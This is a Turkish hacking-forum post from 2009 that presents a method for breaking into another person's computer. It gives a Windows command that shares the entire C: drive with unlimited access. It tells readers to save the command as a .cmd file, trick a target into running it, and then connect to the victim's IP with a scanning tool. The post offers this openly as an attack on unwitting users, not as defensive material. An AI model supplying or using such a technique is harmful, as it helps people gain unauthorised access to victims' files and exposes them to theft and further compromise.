trojensiz pcye girme

DJ_MAHKUM

Yeni üye
10 May 2009
5
0
istnabul
Artık sizde bir pc hackleyeceksiniz olay gerçekten çok basit

net share hacker=c:\ /unlimited /remark:"DJ_MAHKUM SANAL_MAHKUM"


Şimdi şu komutu notepad ile açın:
bunu aynen kopyalayıp yapıştırıyorsunuz.yapıştırdıktan sonra cmd uzantılı farklı kaydediyoruz(yepyeniler için açıklıyorum bunu nasıl yapacağız diyosanız dosya adını koyarken dosya adından sonra .cmd yazıyosun o kadar) işte oluşturduğumuz bu dosyayı artık bir şekilde karşı tarafın pc ye yediriyoruz. kendinizde açmayın!!!
bu dosya karşı tarafın pc yi paylaşıma açık hale getiriyor

Şimdi ise bize lazım olan tek şey bir adet Bui-Bios erişim
bunu nerden mi bulacaksınız;
GİRİŞ

İşteee buradan bui bios erişimi kendi pc nizde açın sol üst köşede ip numarası aralığı var oraya yukarıdaki dosyayı yedirdiğimiz pc nin ip sini yazıp bağlanıyoruz
user_offline.gif
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.